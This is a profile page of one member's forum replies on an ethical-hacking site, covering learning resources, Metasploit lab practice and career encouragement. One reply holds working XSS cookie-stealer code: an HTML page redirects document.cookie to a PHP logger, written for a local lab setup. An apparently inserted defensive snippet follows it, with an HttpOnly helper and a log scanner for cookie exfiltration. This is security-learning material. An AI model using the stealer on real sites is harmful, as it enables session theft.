Gromic

Forum Replies Created

Viewing 14 reply threads
    • #49994
      Gromic
      Participant

      Another great resource to get started with exploit, assembler & co is opensecuritytraining http://opensecuritytraining.info/Training.html

      I found them a couple of days ago and already did their Intro x86 class, which I really liked a lot.

      Haven’t seen them mentioned anywhere here on EHN yet, so I thought I’d share the link for anybody who wants to get started with assembly, exploits, rootkits and other fun stuff.

      Their youtube channel is located here: http://www.youtube.com/user/OpenSecurityTraining/videos?flow=grid&view=1

      Happy hacking!

    • #47489
      Gromic
      Participant

      +1 to what unicityd wrote.

      @ZeroOne I agree with you on that. But as unicityd wrote … it’s not the point to have a working exploit with which you can hack a gazillion of machines, but to learn how Metasploit as a tool functions. And here I think for learning purposes it’s totally fine to follow along an “old” exploit just to see what options there are, how to use them …and so on… So, see it as a “walk before you can run” thing ;o).

      One thought on “who on earth will be using XP with no SPs”, though. Think about all the people who run a stolen/hacked copy of XP (or Vista or Win7) on their machines with update services disabled in panic of not getting caught … I heard this can be quite common in Third World countries. I don’t know any statistics to show this though… it was just a thought…so please don’t get me on this ;o)…

      But you are probably right, in times of vista, win7 an unpatched copy of XP might be rare… (at least I have no personal experience about that…)

      @ cyber.spirit
      I think the patch was originally after SP1(or2) and then later added to the SPs… that’s why we still see Win 2003 in target range in Metasploit (was that your question?!?)…not sure about this though…

      I really like the videos on securitytube. I am quite a fan of the “visual learning approach”….since I can better remember things when someone has shown me how to do it.

      Anyways, have fun with the video series!

    • #47484
      Gromic
      Participant

      Hi cyber.spirit

      I guess you go through Vivek’s videos on Metasploit, right?!

      As far as I know the RPC-dcom exploit has been patched in SP1 or 2 …not 100% sure at the moment.

      However, the exploit will definitely work with an unpatched Win XP – so no SPs (I tested that). Also make sure to disable any (Windows-) firewall.

    • #46895
      Gromic
      Participant

      Hi wlandymore,

      ok this might sound odd – and it’s just a thought …so don’t get me wrong, but do you start your html file in a “server-context” meaning is it in your htdocs or do you just open it on your harddrive?

      Since if you do the second it won’t work or at least you cannot read the cookies from localhost …(Happened to me too…an alertbox on the page worked however the php script couldn’t read cookies…).

      For “debugging” try to throw both scripts in your htdocs … and look if the php script gets the cookies…

      Don’t know if this helps, was just a thought….

      Cheers,
      -gromic

    • #46784
      Gromic
      Participant

      Hi wlandymore, hi ajohnson

      The following code (cookie_site.html and cookiestealer.php) should work (Seems that you just missed a / before your stealer script redirect in your html page).

      I tested it via a xampp setup and it worked.

      Just throw both of the files into your XAMPP htdocs.

      file: cookie_site.html

      <html>
        <head>
          <script>
            document.cookie = "Test123";
          </script>
        </head>
        <body>
          This page is a test
          <script>
            alert(document.cookie)
            document.location = "/cookiestealer.php?cookie=" + document.cookie;
          </script>
        </body>
      </html>

      file: cookiestealer.php

      <?php
        $cookie = $_GET['cookie'];
        $log = fopen("cookielog.txt", "a");
        fwrite($log, $cookie . "\n");
        fclose($log);
      ?>

      Note:

      • So far, page and stealer.php run on the same server (I know…not intended). When you move your stealer.php to another server you have to adjust your path i.e. “http:///cookiestealer.php?cookie=” … and so on..
      • One more tip: When debugging your scripts make sure you delete your browsers cache each time… very often I changed something but my browser (Chrome) showed me still the old results  ;D
      • cross domain issues shouldn’t be a problem since as far as I understood the idea was to place the “stealer script” on a site which is vuln to XSS and steal the cookies related to THIS site, right? If you want to read cookies of another domain you run into “same origin” issues..

      Hope this helps and works for you.
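The post above shows the attack side: page script reads document.cookie and ships it off in a query string. The following is an added example (not code from the thread or from any project named in it) taking the defender's view of the same pattern: a helper that issues the session cookie with the HttpOnly attribute, which keeps it out of reach of document.cookie entirely while the browser still sends it on every request, and a small access-log scanner that flags requests whose query string carries a cookie-shaped value, which is exactly the trace a redirect like "/cookiestealer.php?cookie=" + document.cookie leaves in the web server log. All function names, the session cookie name list and the log lines are constructed for this example.

```javascript
// Added example, not from the original thread. Node.js (no third-party modules).
//
// Part 1: issue cookies so page script cannot read them.
// HttpOnly is what defeats the snippet in the post: the cookie is still sent
// with every request, but document.cookie never exposes it.
function buildSetCookie(name, value, opts = {}) {
  const { httpOnly = true, secure = true, sameSite = 'Lax', maxAge } = opts;
  if (!/^[\w-]+$/.test(name)) throw new Error('invalid cookie name');
  if (/[;,\s]/.test(value)) throw new Error('invalid cookie value');
  const parts = [`${name}=${value}`, 'Path=/'];
  if (maxAge !== undefined) parts.push(`Max-Age=${maxAge}`);
  if (secure) parts.push('Secure');
  if (httpOnly) parts.push('HttpOnly');
  if (sameSite) parts.push(`SameSite=${sameSite}`);
  return parts.join('; ');
}
// Usage on the server side: res.setHeader('Set-Cookie', buildSetCookie('PHPSESSID', id));

// Part 2: spot cookie exfiltration in access logs.
// Constructed list of session cookie names worth watching; extend for your app.
const SESSION_COOKIE_NAMES = ['PHPSESSID', 'JSESSIONID', 'ASP.NET_SessionId', 'sessionid'];

// Parse one "combined" access-log line (Apache/nginx default) into the
// fields we need. Returns null for lines that do not match the format.
const LOG_RE = /^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) \S+" (\d{3}) /;

function parseLogLine(line) {
  const m = LOG_RE.exec(line);
  if (!m) return null;
  return { ip: m[1], time: m[2], method: m[3], path: m[4], status: Number(m[5]) };
}

// A request path is suspicious when a query parameter is literally named
// "cookie"/"cookies", when a parameter value contains a known session cookie
// name followed by "=", or when a value looks like a whole cookie jar
// ("a=1; b=2; ..."). URLSearchParams percent-decodes the values for us.
function isCookieExfil(path) {
  const q = path.indexOf('?');
  if (q < 0) return false;
  const params = new URLSearchParams(path.slice(q + 1));
  for (const [key, value] of params) {
    if (/^cookies?$/i.test(key) && value.length > 0) return true;
    if (SESSION_COOKIE_NAMES.some((n) => value.includes(n + '='))) return true;
    if (/^[\w.-]+=[^;=\s]+(;\s*[\w.-]+=[^;=\s]+)+$/.test(value)) return true;
  }
  return false;
}

// Scan a list of raw log lines and return the parsed requests that match.
function findCookieExfil(logLines) {
  const hits = [];
  for (const line of logLines) {
    const req = parseLogLine(line);
    if (req && isCookieExfil(req.path)) hits.push(req);
  }
  return hits;
}

// Constructed sample log lines (not real traffic). Lines 2 and 4 carry a
// cookie value in the query string; line 3 merely mentions the word "cookie".
const SAMPLE_LOG = [
  '10.0.0.5 - - [12/Mar/2012:10:01:02 +0000] "GET /index.php HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
  '10.0.0.5 - - [12/Mar/2012:10:01:03 +0000] "GET /cookiestealer.php?cookie=PHPSESSID%3Dabc123%3B%20theme%3Ddark HTTP/1.1" 200 0 "-" "Mozilla/5.0"',
  '10.0.0.9 - - [12/Mar/2012:10:02:10 +0000] "GET /search.php?q=cookie%20recipes HTTP/1.1" 200 2048 "-" "Mozilla/5.0"',
  '10.0.0.7 - - [12/Mar/2012:10:03:00 +0000] "GET /img.php?c=JSESSIONID%3Dzz9 HTTP/1.1" 404 0 "-" "Mozilla/5.0"',
];

for (const hit of findCookieExfil(SAMPLE_LOG)) {
  console.log(`possible cookie exfil from ${hit.ip} at ${hit.time}: ${hit.path}`);
}
```

The scanner is deliberately a heuristic: it catches the naive "cookie=" redirect from the post and a pasted cookie jar, but an attacker who encodes the value differently will not match, so treat a hit as a reason to look, and the HttpOnly attribute (plus fixing the XSS itself) as the actual fix.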

    • #46286
      Gromic
      Participant

      Hi Jamie,

      I am really sorry to hear that with your job. I second what everybody has written so far.
      From your posts here on EH-net as well as your site you seem really passionate about ITsec…So DON’T give up!

      “Our greatest glory is not in never failing, but in rising up every time we fail.”
      (Ralph Waldo Emerson)

      Since I am still in my master’s and job hunting for me won’t start before August, this is the only “real advice” I can give you: “DON’T give up, if IT-Sec is really your passion!!”

      If I were in your situation, though, I would first ask your employer for a talk to elaborate on the exact reasons why they have fired you. This might hurt, but will give you valuable information on what you can improve the next time.

      Second I would right away start to apply for new pentesting jobs. Don’t let the “feeling of being not good enough” let you down or discourage you and get right into the game again!
      And only if this won’t work out for whatever reasons “too less job experience”, “too young”….blah blah… try to get a job as admin or what else…to build a solid foundation (always with the goal to learn something new…so no “brain death” jobs). 
      And never forget to focus on your goal or “dream job”!

      I wish you good luck and all the best!! And again: Don’t give up!

    • #46212
      Gromic
      Participant

      @ajohnson wrote:

      You can still donate $20 or something to help cover bandwidth, hosting, etc. I did this the other for the assembly and beginner exploitation videos.

      I did that today, too. I really appreciate the contents and already learned tons out of it.

      I think it’s a good thing to support, even though it’s free (as in freedom not freebeer 😉 ), just to show the appreciation for the effort!

    • #45644
      Gromic
      Participant

      You might also find w3af interesting:
      http://w3af.sourceforge.net/

      It is also coded in Python.

    • #45217
      Gromic
      Participant

      Awesome! Can’t wait for the DVD!

      thx for the update lorddicranius

    • #45425
      Gromic
      Participant

      Welcome blue_hat,

      With programming languages it is always a matter of “the right tool for the right job”.  So as cd1zz mentioned it always depends on your goals.

      Nevertheless I think it is always good to have various programming languages on your “tool belt” since very often they help looking at problems in different ways. Because when holding only the same hammer in your hand …every problem somehow always looks like a nail… (and maybe not like a screw…) 

      Again Welcome to EH-Net!

    • #45434
      Gromic
      Participant

      Hi CeemGee and Welcome to EH-Network! Looking forward to reading more from you in the future

    • #45455
      Gromic
      Participant

      Hi Jamie,

      Love your new design!! (have also been a visitor of your site when it had the old one)

      Wow, I am jealous , since setting up a page/blog is also on my toDo list for quite some time now (the domain is already set)… and your site is just what I had imagined  ;D.

      Maybe a bit off topic but I found out that you have removed the Syngress XSS Attack book from your “future” reading list ( If I can remember it right). 
      Any reasons for this? Since I bought it the other week and think it is quite an interesting read (read the first 100 pages so far). 
      Reading it always makes me shiver of what’s all possible with Xss…
      Anyways…getting back to the topic…

      Great page!  Good luck with it!

    • #45211
      Gromic
      Participant

      The Wifi-Sec iso file is 4,23 GB big ^^ Don’t know if they sell/ship it.

    • #45201
      Gromic
      Participant

      A site for a great overview of different vulnerable systems/apps for a pentest lab is:
      http://g0tmi1k.blogspot.com/2011/03/vulnerable-by-design.html

    • #45031
      Gromic
      Participant

      heheh…way to go 3xban! Sorry, for putting you under peer pressure!

      I totally know what you mean on the “wasting time to gaming” part …It’s just frightening how much time (or better sleep…) one loses to such games… I just hope I will never get started with “Star Wars the old republic” … So far I have managed to stay away ^^

      Like you said, better put the time and effort into something more useful!!


Copyright ©2020 Caendra, Inc.
